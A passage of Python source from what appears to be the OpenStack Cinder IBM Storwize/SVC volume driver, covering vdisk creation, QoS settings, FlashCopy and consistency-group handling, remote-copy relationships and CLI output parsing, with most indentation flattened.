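    # uses SCSI IDs [0, 1, 3], the gap-finding loop above maps the new
    # volume at LUN 2, the first unused ID.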
def unmap_vol_from_host(self, volume_name, host_name):
"""Unmap the volume and delete the host if it has no more mappings."""
LOG.debug('Enter: unmap_vol_from_host: volume %(volume_name)s from '
'host %(host_name)s.',
{'volume_name': volume_name, 'host_name': host_name})
# Check if the mapping exists
resp = self.ssh.lsvdiskhostmap(volume_name)
if not len(resp):
LOG.warning(_LW('unmap_vol_from_host: No mapping of volume '
'%(vol_name)s to any host found.'),
{'vol_name': volume_name})
return
if host_name is None:
if len(resp) > 1:
LOG.warning(_LW('unmap_vol_from_host: Multiple mappings of '
'volume %(vol_name)s found, no host '
'specified.'), {'vol_name': volume_name})
return
else:
host_name = resp[0]['host_name']
else:
found = False
for h in resp.select('host_name'):
if h == host_name:
found = True
if not found:
LOG.warning(_LW('unmap_vol_from_host: No mapping of volume '
'%(vol_name)s to host %(host)s found.'),
{'vol_name': volume_name, 'host': host_name})
# We now know that the mapping exists
self.ssh.rmvdiskhostmap(host_name, volume_name)
LOG.debug('Leave: unmap_vol_from_host: volume %(volume_name)s from '
'host %(host_name)s.',
{'volume_name': volume_name, 'host_name': host_name})
return host_name
def check_host_mapped_vols(self, host_name):
return self.ssh.lshostvdiskmap(host_name)
@staticmethod
def build_default_opts(config):
# Ignore capitalization
cluster_partner = config.storwize_svc_stretched_cluster_partner
opt = {'rsize': config.storwize_svc_vol_rsize,
'warning': config.storwize_svc_vol_warning,
'autoexpand': config.storwize_svc_vol_autoexpand,
'grainsize': config.storwize_svc_vol_grainsize,
'compression': config.storwize_svc_vol_compression,
'easytier': config.storwize_svc_vol_easytier,
'iogrp': config.storwize_svc_vol_iogrp,
'qos': None,
'stretched_cluster': cluster_partner,
'replication': False,
'nofmtdisk': config.storwize_svc_vol_nofmtdisk}
return opt
@staticmethod
def check_vdisk_opts(state, opts):
# Check that grainsize is 32/64/128/256
if opts['grainsize'] not in [32, 64, 128, 256]:
raise exception.InvalidInput(
reason=_('Illegal value specified for '
'storwize_svc_vol_grainsize: set to either '
'32, 64, 128, or 256.'))
# Check that compression is supported
if opts['compression'] and not state['compression_enabled']:
raise exception.InvalidInput(
reason=_('System does not support compression.'))
# Check that rsize is set if compression is set
if opts['compression'] and opts['rsize'] == -1:
raise exception.InvalidInput(
reason=_('If compression is set to True, rsize must '
'also be set (not equal to -1).'))
if opts['iogrp'] not in state['available_iogrps']:
avail_grps = ''.join(str(e) for e in state['available_iogrps'])
raise exception.InvalidInput(
reason=_('I/O group %(iogrp)d is not valid; available '
'I/O groups are %(avail)s.')
% {'iogrp': opts['iogrp'],
'avail': avail_grps})
if opts['nofmtdisk'] and opts['rsize'] != -1:
raise exception.InvalidInput(
reason=_('If nofmtdisk is set to True, rsize must '
'also be set to -1.'))
def _get_opts_from_specs(self, opts, specs):
qos = {}
for k, value in specs.items():
# Get the scope, if using scope format
key_split = k.split(':')
if len(key_split) == 1:
scope = None
key = key_split[0]
else:
scope = key_split[0]
key = key_split[1]
# We generally do not look at capabilities in the driver, but
# replication is a special case where the user asks for
# a volume to be replicated, and we want both the scheduler and
# the driver to act on the value.
if ((not scope or scope == 'capabilities') and
key == 'replication'):
scope = None
key = 'replication'
words = value.split()
if not (words and len(words) == 2 and words[0] == '<is>'):
LOG.error(_LE('Replication must be specified as '
'\'<is> True\' or \'<is> False\'.'))
del words[0]
value = words[0]
# Add the QoS.
if scope and scope == 'qos':
if key in self.svc_qos_keys.keys():
try:
type_fn = self.svc_qos_keys[key]['type']
value = type_fn(value)
qos[key] = value
except ValueError:
continue
# Any keys that the driver should look at should have the
# 'drivers' scope.
if scope and scope != 'drivers':
continue
if key in opts:
this_type = type(opts[key]).__name__
if this_type == 'int':
value = int(value)
elif this_type == 'bool':
value = strutils.bool_from_string(value)
opts[key] = value
if len(qos) != 0:
opts['qos'] = qos
return opts
def _get_qos_from_volume_metadata(self, volume_metadata):
"""Return the QoS information from the volume metadata."""
qos = {}
for i in volume_metadata:
k = i.get('key', None)
value = i.get('value', None)
key_split = k.split(':')
if len(key_split) == 1:
scope = None
key = key_split[0]
else:
scope = key_split[0]
key = key_split[1]
# Add the QoS.
if scope and scope == 'qos':
if key in self.svc_qos_keys.keys():
try:
type_fn = self.svc_qos_keys[key]['type']
value = type_fn(value)
qos[key] = value
except ValueError:
continue
return qos
def _wait_for_a_condition(self, testmethod, timeout=None,
interval=INTERVAL_1_SEC):
start_time = time.time()
if timeout is None:
timeout = DEFAULT_TIMEOUT
def _inner():
try:
testValue = testmethod()
except Exception as ex:
testValue = False
LOG.debug('Helper.'
'_wait_for_condition: %(method_name)s '
'execution failed for %(exception)s.',
{'method_name': testmethod.__name__,
'exception': ex.message})
if testValue:
raise loopingcall.LoopingCallDone()
if int(time.time()) - start_time > timeout:
msg = (_('CommandLineHelper._wait_for_condition: %s timeout.')
% testmethod.__name__)
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
timer = loopingcall.FixedIntervalLoopingCall(_inner)
timer.start(interval=interval).wait()
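    # Illustrative usage (a minimal sketch using names from this class):
    #   self._wait_for_a_condition(
    #       lambda: self.is_vdisk_defined('volume-1'), timeout=30)
    # polls once per second and raises VolumeBackendAPIException on timeout.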
def get_vdisk_params(self, config, state, type_id,
volume_type=None, volume_metadata=None):
"""Return the parameters for creating the vdisk.
Takes volume type and defaults from config options into account.
"""
opts = self.build_default_opts(config)
ctxt = context.get_admin_context()
if volume_type is None and type_id is not None:
volume_type = volume_types.get_volume_type(ctxt, type_id)
if volume_type:
qos_specs_id = volume_type.get('qos_specs_id')
specs = dict(volume_type).get('extra_specs')
# NOTE(vhou): We prefer the qos_specs association
# and over-ride any existing
# extra-specs settings if present
if qos_specs_id is not None:
kvs = qos_specs.get_qos_specs(ctxt, qos_specs_id)['specs']
# Merge the qos_specs into extra_specs and qos_specs has higher
# priority than extra_specs if they have different values for
# the same key.
specs.update(kvs)
opts = self._get_opts_from_specs(opts, specs)
if (opts['qos'] is None and config.storwize_svc_allow_tenant_qos
and volume_metadata):
qos = self._get_qos_from_volume_metadata(volume_metadata)
if len(qos) != 0:
opts['qos'] = qos
self.check_vdisk_opts(state, opts)
return opts
@staticmethod
def _get_vdisk_create_params(opts):
easytier = 'on' if opts['easytier'] else 'off'
if opts['rsize'] == -1:
params = []
if opts['nofmtdisk']:
params.append('-nofmtdisk')
else:
params = ['-rsize', '%s%%' % str(opts['rsize']),
'-autoexpand', '-warning',
'%s%%' % str(opts['warning'])]
if not opts['autoexpand']:
params.remove('-autoexpand')
if opts['compression']:
params.append('-compressed')
else:
params.extend(['-grainsize', str(opts['grainsize'])])
params.extend(['-easytier', easytier])
return params
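    # Illustrative example (driver defaults assumed): with rsize=2,
    # warning=0, autoexpand=True, compression=False, grainsize=256 and
    # easytier=True, this returns:
    #   ['-rsize', '2%', '-autoexpand', '-warning', '0%',
    #    '-grainsize', '256', '-easytier', 'on']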
def create_vdisk(self, name, size, units, pool, opts):
LOG.debug('Enter: create_vdisk: vdisk %s.', name)
params = self._get_vdisk_create_params(opts)
self.ssh.mkvdisk(name, size, units, pool, opts, params)
LOG.debug('Leave: _create_vdisk: volume %s.', name)
def get_vdisk_attributes(self, vdisk):
attrs = self.ssh.lsvdisk(vdisk)
return attrs
def is_vdisk_defined(self, vdisk_name):
"""Check if vdisk is defined."""
attrs = self.get_vdisk_attributes(vdisk_name)
return attrs is not None
def find_vdisk_copy_id(self, vdisk, pool):
resp = self.ssh.lsvdiskcopy(vdisk)
for copy_id, mdisk_grp in resp.select('copy_id', 'mdisk_grp_name'):
if mdisk_grp == pool:
return copy_id
msg = _('Failed to find a vdisk copy in the expected pool.')
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
def get_vdisk_copy_attrs(self, vdisk, copy_id):
return self.ssh.lsvdiskcopy(vdisk, copy_id=copy_id)[0]
def get_vdisk_copies(self, vdisk):
copies = {'primary': None,
'secondary': None}
resp = self.ssh.lsvdiskcopy(vdisk)
for copy_id, status, sync, primary, mdisk_grp in (
resp.select('copy_id', 'status', 'sync',
'primary', 'mdisk_grp_name')):
copy = {'copy_id': copy_id,
'status': status,
'sync': sync,
'primary': primary,
'mdisk_grp_name': mdisk_grp,
'sync_progress': None}
if copy['sync'] != 'yes':
progress_info = self.ssh.lsvdisksyncprogress(vdisk, copy_id)
copy['sync_progress'] = progress_info['progress']
if copy['primary'] == 'yes':
copies['primary'] = copy
else:
copies['secondary'] = copy
return copies
def _prepare_fc_map(self, fc_map_id, timeout):
self.ssh.prestartfcmap(fc_map_id)
mapping_ready = False
wait_time = 5
max_retries = (timeout // wait_time) + 1
for try_number in range(1, max_retries):
mapping_attrs = self._get_flashcopy_mapping_attributes(fc_map_id)
if (mapping_attrs is None or
'status' not in mapping_attrs):
break
if mapping_attrs['status'] == 'prepared':
mapping_ready = True
break
elif mapping_attrs['status'] == 'stopped':
self.ssh.prestartfcmap(fc_map_id)
elif mapping_attrs['status'] != 'preparing':
                msg = (_('Unexpected mapping status %(status)s for mapping '
'%(id)s. Attributes: %(attr)s.')
% {'status': mapping_attrs['status'],
'id': fc_map_id,
'attr': mapping_attrs})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
greenthread.sleep(wait_time)
if not mapping_ready:
            msg = (_('Mapping %(id)s prepare failed to complete within the '
'allotted %(to)d seconds timeout. Terminating.')
% {'id': fc_map_id,
'to': timeout})
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
def start_fc_consistgrp(self, fc_consistgrp):
self.ssh.startfcconsistgrp(fc_consistgrp)
def create_fc_consistgrp(self, fc_consistgrp):
self.ssh.mkfcconsistgrp(fc_consistgrp)
def delete_fc_consistgrp(self, fc_consistgrp):
self.ssh.rmfcconsistgrp(fc_consistgrp)
def stop_fc_consistgrp(self, fc_consistgrp):
self.ssh.stopfcconsistgrp(fc_consistgrp)
def run_consistgrp_snapshots(self, fc_consistgrp, snapshots, state,
config, timeout):
cgsnapshot = {'status': 'available'}
try:
for snapshot in snapshots:
opts = self.get_vdisk_params(config, state,
snapshot['volume_type_id'])
self.create_flashcopy_to_consistgrp(snapshot['volume_name'],
snapshot['name'],
fc_consistgrp,
config, opts)
snapshot['status'] = 'available'
self.prepare_fc_consistgrp(fc_consistgrp, timeout)
self.start_fc_consistgrp(fc_consistgrp)
            # There is a CG limitation that at most 128 CGs can exist at a
            # time. After starting the CG, we delete it to avoid hitting
            # that limit; Cinder itself maintains the CG-to-snapshot
            # relationship.
self.delete_fc_consistgrp(fc_consistgrp)
except exception.VolumeBackendAPIException as err:
for snapshot in snapshots:
snapshot['status'] = 'error'
cgsnapshot['status'] = 'error'
# Release cg
self.delete_fc_consistgrp(fc_consistgrp)
LOG.error(_LE("Failed to create CGSnapshot. "
"Exception: %s."), err)
return cgsnapshot, snapshots
def delete_consistgrp_snapshots(self, fc_consistgrp, snapshots):
"""Delete flashcopy maps and consistent group."""
cgsnapshot = {'status': 'available'}
try:
for snapshot in snapshots:
self.ssh.rmvdisk(snapshot['name'], True)
snapshot['status'] = 'deleted'
except exception.VolumeBackendAPIException as err:
for snapshot in snapshots:
snapshot['status'] = 'error_deleting'
cgsnapshot['status'] = 'error_deleting'
LOG.error(_LE("Failed to delete the snapshot %(snap)s of "
"CGSnapshot. Exception: %(exception)s."),
{'snap': snapshot['name'], 'exception': err})
return cgsnapshot, snapshots
def prepare_fc_consistgrp(self, fc_consistgrp, timeout):
"""Prepare FC Consistency Group."""
self.ssh.prestartfcconsistgrp(fc_consistgrp)
def prepare_fc_consistgrp_success():
mapping_ready = False
mapping_attrs = self._get_flashcopy_consistgrp_attr(fc_consistgrp)
            if (mapping_attrs is None or
                    'status' not in mapping_attrs):
                return mapping_ready
if mapping_attrs['status'] == 'prepared':
mapping_ready = True
elif mapping_attrs['status'] == 'stopped':
self.ssh.prestartfcconsistgrp(fc_consistgrp)
elif mapping_attrs['status'] != 'preparing':
                msg = (_('Unexpected mapping status %(status)s for mapping '
'%(id)s. Attributes: %(attr)s.') %
{'status': mapping_attrs['status'],
'id': fc_consistgrp,
'attr': mapping_attrs})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
return mapping_ready
self._wait_for_a_condition(prepare_fc_consistgrp_success, timeout)
def create_cg_from_source(self, group, fc_consistgrp,
sources, targets, state,
config, timeout):
"""Create consistence group from source"""
LOG.debug('Enter: create_cg_from_source: cg %(cg)s'
' source %(source)s, target %(target)s',
{'cg': fc_consistgrp, 'source': sources, 'target': targets})
model_update = {'status': fields.ConsistencyGroupStatus.AVAILABLE}
ctxt = context.get_admin_context()
try:
for source, target in zip(sources, targets):
opts = self.get_vdisk_params(config, state,
source['volume_type_id'])
pool = utils.extract_host(target['host'], 'pool')
self.create_flashcopy_to_consistgrp(source['name'],
target['name'],
fc_consistgrp,
config, opts,
True, pool=pool)
self.prepare_fc_consistgrp(fc_consistgrp, timeout)
self.start_fc_consistgrp(fc_consistgrp)
self.delete_fc_consistgrp(fc_consistgrp)
volumes_model_update = self._get_volume_model_updates(
ctxt, targets, group['id'], model_update['status'])
except exception.VolumeBackendAPIException as err:
model_update['status'] = fields.ConsistencyGroupStatus.ERROR
volumes_model_update = self._get_volume_model_updates(
ctxt, targets, group['id'], model_update['status'])
with excutils.save_and_reraise_exception():
# Release cg
self.delete_fc_consistgrp(fc_consistgrp)
LOG.error(_LE("Failed to create CG from CGsnapshot. "
"Exception: %s"), err)
return model_update, volumes_model_update
LOG.debug('Leave: create_cg_from_source.')
return model_update, volumes_model_update
def _get_volume_model_updates(self, ctxt, volumes, cgId,
status='available'):
"""Update the volume model's status and return it."""
volume_model_updates = []
LOG.info(_LI(
"Updating status for CG: %(id)s."),
{'id': cgId})
if volumes:
for volume in volumes:
volume_model_updates.append({'id': volume['id'],
'status': status})
else:
LOG.info(_LI("No volume found for CG: %(cg)s."),
{'cg': cgId})
return volume_model_updates
def run_flashcopy(self, source, target, timeout, copy_rate,
full_copy=True):
"""Create a FlashCopy mapping from the source to the target."""
LOG.debug('Enter: run_flashcopy: execute FlashCopy from source '
'%(source)s to target %(target)s.',
{'source': source, 'target': target})
fc_map_id = self.ssh.mkfcmap(source, target, full_copy, copy_rate)
self._prepare_fc_map(fc_map_id, timeout)
self.ssh.startfcmap(fc_map_id)
LOG.debug('Leave: run_flashcopy: FlashCopy started from '
'%(source)s to %(target)s.',
{'source': source, 'target': target})
def create_flashcopy_to_consistgrp(self, source, target, consistgrp,
config, opts, full_copy=False,
pool=None):
"""Create a FlashCopy mapping and add to consistent group."""
LOG.debug('Enter: create_flashcopy_to_consistgrp: create FlashCopy'
                  ' from source %(source)s to target %(target)s, '
                  'then add the flashcopy to %(cg)s.',
{'source': source, 'target': target, 'cg': consistgrp})
src_attrs = self.get_vdisk_attributes(source)
if src_attrs is None:
msg = (_('create_copy: Source vdisk %(src)s '
'does not exist.') % {'src': source})
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
src_size = src_attrs['capacity']
# In case we need to use a specific pool
if not pool:
pool = src_attrs['mdisk_grp_name']
self.create_vdisk(target, src_size, 'b', pool, opts)
self.ssh.mkfcmap(source, target, full_copy,
config.storwize_svc_flashcopy_rate,
consistgrp=consistgrp)
LOG.debug('Leave: create_flashcopy_to_consistgrp: '
'FlashCopy started from %(source)s to %(target)s.',
{'source': source, 'target': target})
def _get_vdisk_fc_mappings(self, vdisk):
"""Return FlashCopy mappings that this vdisk is associated with."""
mapping_ids = []
resp = self.ssh.lsvdiskfcmappings(vdisk)
        for fc_map_id in resp.select('id'):
            mapping_ids.append(fc_map_id)
return mapping_ids
def _get_flashcopy_mapping_attributes(self, fc_map_id):
resp = self.ssh.lsfcmap(fc_map_id)
if not len(resp):
return None
return resp[0]
def _get_flashcopy_consistgrp_attr(self, fc_map_id):
resp = self.ssh.lsfcconsistgrp(fc_map_id)
if not len(resp):
return None
return resp[0]
def _check_vdisk_fc_mappings(self, name, allow_snaps=True):
"""FlashCopy mapping check helper."""
LOG.debug('Loopcall: _check_vdisk_fc_mappings(), vdisk %s.', name)
mapping_ids = self._get_vdisk_fc_mappings(name)
wait_for_copy = False
for map_id in mapping_ids:
attrs = self._get_flashcopy_mapping_attributes(map_id)
if not attrs:
continue
source = attrs['source_vdisk_name']
target = attrs['target_vdisk_name']
copy_rate = attrs['copy_rate']
status = attrs['status']
if copy_rate == '0':
if source == name:
# Vdisk with snapshots. Return False if snapshot
# not allowed.
if not allow_snaps:
raise loopingcall.LoopingCallDone(retvalue=False)
self.ssh.chfcmap(map_id, copyrate='50', autodel='on')
wait_for_copy = True
else:
# A snapshot
if target != name:
msg = (_('Vdisk %(name)s not involved in '
'mapping %(src)s -> %(tgt)s.') %
{'name': name, 'src': source, 'tgt': target})
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
if status in ['copying', 'prepared']:
self.ssh.stopfcmap(map_id)
                        # Need to wait for the fcmap to reach the
                        # stopped state before removing it.
wait_for_copy = True
elif status in ['stopping', 'preparing']:
wait_for_copy = True
else:
self.ssh.rmfcmap(map_id)
# Case 4: Copy in progress - wait and will autodelete
else:
if status == 'prepared':
self.ssh.stopfcmap(map_id)
self.ssh.rmfcmap(map_id)
elif status == 'idle_or_copied':
# Prepare failed
self.ssh.rmfcmap(map_id)
else:
wait_for_copy = True
if not wait_for_copy or not len(mapping_ids):
raise loopingcall.LoopingCallDone(retvalue=True)
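    # Summary (editor's note, not from the original code): the loop above
    # handles two families of mappings. With copy_rate == '0' the mapping
    # is a snapshot relationship, which is either sped up for deletion
    # (source == vdisk) or stopped/removed (target == vdisk); with a
    # non-zero copy_rate it is a full copy, which is stopped, removed, or
    # awaited depending on its status.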
def ensure_vdisk_no_fc_mappings(self, name, allow_snaps=True):
"""Ensure vdisk has no flashcopy mappings."""
timer = loopingcall.FixedIntervalLoopingCall(
self._check_vdisk_fc_mappings, name, allow_snaps)
# Create a timer greenthread. The default volume service heart
# beat is every 10 seconds. The flashcopy usually takes hours
# before it finishes. Don't set the sleep interval shorter
# than the heartbeat. Otherwise volume service heartbeat
# will not be serviced.
LOG.debug('Calling _ensure_vdisk_no_fc_mappings: vdisk %s.',
name)
ret = timer.start(interval=self.check_fcmapping_interval).wait()
timer.stop()
return ret
def start_relationship(self, volume_name, primary=None):
vol_attrs = self.get_vdisk_attributes(volume_name)
if vol_attrs['RC_name']:
self.ssh.startrcrelationship(vol_attrs['RC_name'], primary)
def stop_relationship(self, volume_name):
vol_attrs = self.get_vdisk_attributes(volume_name)
if vol_attrs['RC_name']:
self.ssh.stoprcrelationship(vol_attrs['RC_name'], access=True)
    def create_relationship(self, master, aux, system, asyncmirror):
        name = 'rcrel' + ''.join(random.sample(string.digits, 10))
        rc_id = None
        try:
            rc_id = self.ssh.mkrcrelationship(master, aux, system, name,
                                              asyncmirror)
        except exception.VolumeBackendAPIException as e:
            # CMMVC5959E is the Storwize error code meaning that a
            # relationship with this name already exists on the
            # master cluster.
            if 'CMMVC5959E' not in six.text_type(e):
                # If there is no relation between the primary and the
                # secondary back-end storage, the exception is raised.
                raise
        if rc_id:
            self.start_relationship(master)
def delete_relationship(self, volume_name):
vol_attrs = self.get_vdisk_attributes(volume_name)
if vol_attrs['RC_name']:
self.ssh.stoprcrelationship(vol_attrs['RC_name'])
self.ssh.rmrcrelationship(vol_attrs['RC_name'])
vol_attrs = self.get_vdisk_attributes(volume_name)
def get_relationship_info(self, volume):
vol_attrs = self.get_vdisk_attributes(volume['name'])
if not vol_attrs or not vol_attrs['RC_name']:
LOG.info(_LI("Unable to get remote copy information for "
"volume %s"), volume['name'])
return
relationship = self.ssh.lsrcrelationship(vol_attrs['RC_name'])
return relationship[0] if len(relationship) > 0 else None
def switch_relationship(self, relationship, aux=True):
self.ssh.switchrelationship(relationship, aux)
def get_partnership_info(self, system_name):
partnership = self.ssh.lspartnership(system_name)
return partnership[0] if len(partnership) > 0 else None
def get_partnershipcandidate_info(self, system_name):
candidates = self.ssh.lspartnershipcandidate()
for candidate in candidates:
if system_name == candidate['name']:
return candidate
return None
    def mkippartnership(self, ip_v4, bandwidth=1000):
        self.ssh.mkippartnership(ip_v4, bandwidth)
    def mkfcpartnership(self, system_name, bandwidth=1000):
        self.ssh.mkfcpartnership(system_name, bandwidth)
def startpartnership(self, partnership_id):
self.ssh.startpartnership(partnership_id)
def delete_vdisk(self, vdisk, force):
"""Ensures that vdisk is not part of FC mapping and deletes it."""
LOG.debug('Enter: delete_vdisk: vdisk %s.', vdisk)
if not self.is_vdisk_defined(vdisk):
LOG.info(_LI('Tried to delete non-existent vdisk %s.'), vdisk)
return
self.ensure_vdisk_no_fc_mappings(vdisk)
self.ssh.rmvdisk(vdisk, force=force)
LOG.debug('Leave: delete_vdisk: vdisk %s.', vdisk)
def create_copy(self, src, tgt, src_id, config, opts,
full_copy, pool=None):
"""Create a new snapshot using FlashCopy."""
LOG.debug('Enter: create_copy: snapshot %(src)s to %(tgt)s.',
{'tgt': tgt, 'src': src})
src_attrs = self.get_vdisk_attributes(src)
if src_attrs is None:
msg = (_('create_copy: Source vdisk %(src)s (%(src_id)s) '
'does not exist.') % {'src': src, 'src_id': src_id})
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
src_size = src_attrs['capacity']
# In case we need to use a specific pool
if not pool:
pool = src_attrs['mdisk_grp_name']
self.create_vdisk(tgt, src_size, 'b', pool, opts)
timeout = config.storwize_svc_flashcopy_timeout
try:
self.run_flashcopy(src, tgt, timeout,
config.storwize_svc_flashcopy_rate,
full_copy=full_copy)
except Exception:
with excutils.save_and_reraise_exception():
self.delete_vdisk(tgt, True)
LOG.debug('Leave: _create_copy: snapshot %(tgt)s from '
'vdisk %(src)s.',
{'tgt': tgt, 'src': src})
def extend_vdisk(self, vdisk, amount):
self.ssh.expandvdisksize(vdisk, amount)
def add_vdisk_copy(self, vdisk, dest_pool, volume_type, state, config):
"""Add a vdisk copy in the given pool."""
resp = self.ssh.lsvdiskcopy(vdisk)
if len(resp) > 1:
msg = (_('add_vdisk_copy failed: A copy of volume %s exists. '
'Adding another copy would exceed the limit of '
'2 copies.') % vdisk)
raise exception.VolumeDriverException(message=msg)
orig_copy_id = resp[0].get("copy_id", None)
if orig_copy_id is None:
msg = (_('add_vdisk_copy started without a vdisk copy in the '
'expected pool.'))
LOG.error(msg)
raise exception.VolumeDriverException(message=msg)
if volume_type is None:
opts = self.get_vdisk_params(config, state, None)
else:
opts = self.get_vdisk_params(config, state, volume_type['id'],
volume_type=volume_type)
params = self._get_vdisk_create_params(opts)
new_copy_id = self.ssh.addvdiskcopy(vdisk, dest_pool, params)
return (orig_copy_id, new_copy_id)
def is_vdisk_copy_synced(self, vdisk, copy_id):
sync = self.ssh.lsvdiskcopy(vdisk, copy_id=copy_id)[0]['sync']
if sync == 'yes':
return True
return False
def rm_vdisk_copy(self, vdisk, copy_id):
self.ssh.rmvdiskcopy(vdisk, copy_id)
@staticmethod
def can_migrate_to_host(host, state):
if 'location_info' not in host['capabilities']:
return None
info = host['capabilities']['location_info']
try:
(dest_type, dest_id, dest_pool) = info.split(':')
except ValueError:
return None
if (dest_type != 'StorwizeSVCDriver' or dest_id != state['system_id']):
return None
return dest_pool
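    # Illustrative sketch (not from the original code): the
    # 'location_info' capability parsed above is a colon-separated
    # triple; the values below are hypothetical.
    #   'StorwizeSVCDriver:000002032100613E:openstack_pool'
    #   -> dest_type='StorwizeSVCDriver', dest_id='000002032100613E',
    #      dest_pool='openstack_pool'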
def add_vdisk_qos(self, vdisk, qos):
"""Add the QoS configuration to the volume."""
for key, value in qos.items():
if key in self.svc_qos_keys.keys():
param = self.svc_qos_keys[key]['param']
self.ssh.chvdisk(vdisk, ['-' + param, str(value)])
def update_vdisk_qos(self, vdisk, qos):
"""Update all the QoS in terms of a key and value.
svc_qos_keys saves all the supported QoS parameters. Going through
this dict, we set the new values to all the parameters. If QoS is
available in the QoS configuration, the value is taken from it;
if not, the value will be set to default.
"""
for key, value in self.svc_qos_keys.items():
param = value['param']
if key in qos.keys():
# If the value is set in QoS, take the value from
# the QoS configuration.
v = qos[key]
else:
# If not, set the value to default.
v = value['default']
self.ssh.chvdisk(vdisk, ['-' + param, str(v)])
def disable_vdisk_qos(self, vdisk, qos):
"""Disable the QoS."""
for key, value in qos.items():
if key in self.svc_qos_keys.keys():
param = self.svc_qos_keys[key]['param']
# Take the default value.
value = self.svc_qos_keys[key]['default']
self.ssh.chvdisk(vdisk, ['-' + param, value])
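    # Illustrative sketch (not from the original code): a QoS dict as
    # consumed by add_vdisk_qos/update_vdisk_qos/disable_vdisk_qos above.
    # The key assumes a matching svc_qos_keys entry, and the vdisk name
    # is hypothetical:
    #   qos = {'IOThrottling': 500}
    #   helpers.add_vdisk_qos('volume-1234', qos)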
def change_vdisk_options(self, vdisk, changes, opts, state):
if 'warning' in opts:
opts['warning'] = '%s%%' % str(opts['warning'])
if 'easytier' in opts:
opts['easytier'] = 'on' if opts['easytier'] else 'off'
if 'autoexpand' in opts:
opts['autoexpand'] = 'on' if opts['autoexpand'] else 'off'
for key in changes:
self.ssh.chvdisk(vdisk, ['-' + key, opts[key]])
def change_vdisk_iogrp(self, vdisk, state, iogrp):
if state['code_level'] < (6, 4, 0, 0):
LOG.debug('Ignore change IO group as storage code level is '
'%(code_level)s, below the required 6.4.0.0.',
{'code_level': state['code_level']})
else:
self.ssh.movevdisk(vdisk, str(iogrp[0]))
self.ssh.addvdiskaccess(vdisk, str(iogrp[0]))
self.ssh.rmvdiskaccess(vdisk, str(iogrp[1]))
def vdisk_by_uid(self, vdisk_uid):
"""Returns the properties of the vdisk with the specified UID.
Returns None if no such disk exists.
"""
vdisks = self.ssh.lsvdisks_from_filter('vdisk_UID', vdisk_uid)
if len(vdisks) == 0:
return None
if len(vdisks) != 1:
msg = (_('Expected single vdisk returned from lsvdisk when '
'filtering on vdisk_UID. %(count)s were returned.') %
{'count': len(vdisks)})
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
vdisk = vdisks.result[0]
return self.ssh.lsvdisk(vdisk['name'])
def is_vdisk_in_use(self, vdisk):
"""Returns True if the specified vdisk is mapped to at least 1 host."""
resp = self.ssh.lsvdiskhostmap(vdisk)
return len(resp) != 0
def rename_vdisk(self, vdisk, new_name):
self.ssh.chvdisk(vdisk, ['-name', new_name])
def change_vdisk_primary_copy(self, vdisk, copy_id):
self.ssh.chvdisk(vdisk, ['-primary', copy_id])
class CLIResponse(object):
"""Parse SVC CLI output and generate iterable."""
def __init__(self, raw, ssh_cmd=None, delim='!', with_header=True):
super(CLIResponse, self).__init__()
if ssh_cmd:
self.ssh_cmd = ' '.join(ssh_cmd)
else:
self.ssh_cmd = 'None'
self.raw = raw
self.delim = delim
self.with_header = with_header
self.result = self._parse()
def select(self, *keys):
for a in self.result:
vs = []
for k in keys:
v = a.get(k, None)
if isinstance(v, six.string_types) or v is None:
v = [v]
if isinstance(v, list):
vs.append(v)
for item in zip(*vs):
if len(item) == 1:
yield item[0]
else:
yield item
def __getitem__(self, key):
try:
return self.result[key]
except KeyError:
msg = (_('Did not find the expected key %(key)s in %(fun)s: '
'%(raw)s.') % {'key': key, 'fun': self.ssh_cmd,
'raw': self.raw})
raise exception.VolumeBackendAPIException(data=msg)
def __iter__(self):
for a in self.result:
yield a
def __len__(self):
return len(self.result)
def _parse(self):
def get_reader(content, delim):
for line in content.lstrip().splitlines():
line = line.strip()
if line:
yield line.split(delim)
else:
yield []
if isinstance(self.raw, six.string_types):
stdout, stderr = self.raw, ''
else:
stdout, stderr = self.raw
reader = get_reader(stdout, self.delim)
result = []
if self.with_header:
hds = tuple()
for row in reader:
hds = row
break
for row in reader:
cur = dict()
if len(hds) != len(row):
msg = (_('Unexpected CLI response: header/row mismatch. '
'header: %(header)s, row: %(row)s.')
% {'header': hds,
'row': row})
raise exception.VolumeBackendAPIException(data=msg)
for k, v in zip(hds, row):
CLIResponse.append_dict(cur, k, v)
result.append(cur)
else:
cur = dict()
for row in reader:
if row:
CLIResponse.append_dict(cur, row[0], ' '.join(row[1:]))
elif cur: # start new section
result.append(cur)
cur = dict()
if cur:
result.append(cur)
return result
@staticmethod
def append_dict(dict_, key, value):
key, value = key.strip(), value.strip()
obj = dict_.get(key, None)
if obj is None:
dict_[key] = value
elif isinstance(obj, list):
obj.append(value)
dict_[key] = obj
else:
dict_[key] = [obj, value]
return dict_
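# Illustrative sketch (not from the original code): how CLIResponse
# turns '!'-delimited CLI output into dicts. The raw output below is
# made up:
#   raw = 'id!name\n1!vdisk-a\n2!vdisk-b\n'
#   resp = CLIResponse(raw, ssh_cmd=['lsvdisk'], delim='!',
#                      with_header=True)
#   len(resp)                  # -> 2
#   resp[0]['name']            # -> 'vdisk-a'
#   list(resp.select('name'))  # -> ['vdisk-a', 'vdisk-b']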
class StorwizeSVCCommonDriver(san.SanDriver,
driver.ManageableVD,
driver.ExtendVD, driver.SnapshotVD,
driver.MigrateVD, driver.ReplicaVD,
driver.ConsistencyGroupVD,
driver.CloneableImageVD,
driver.TransferVD):
"""IBM Storwize V7000 SVC abstract base class for iSCSI/FC volume drivers.
Version history:
1.0 - Initial driver
1.1 - FC support, create_cloned_volume, volume type support,
get_volume_stats, minor bug fixes
1.2.0 - Added retype
1.2.1 - Code refactor, improved exception handling
1.2.2 - Fix bug #1274123 (races in host-related functions)
    1.2.3 - Fix Fibre Channel connectivity: bug #1279758 (add delim to
            lsfabric, clear unused data from connections, ensure matching
            WWPNs by comparing lower case)
1.2.4 - Fix bug #1278035 (async migration/retype)
1.2.5 - Added support for manage_existing (unmanage is inherited)
1.2.6 - Added QoS support in terms of I/O throttling rate
1.3.1 - Added support for volume replication
1.3.2 - Added support for consistency group
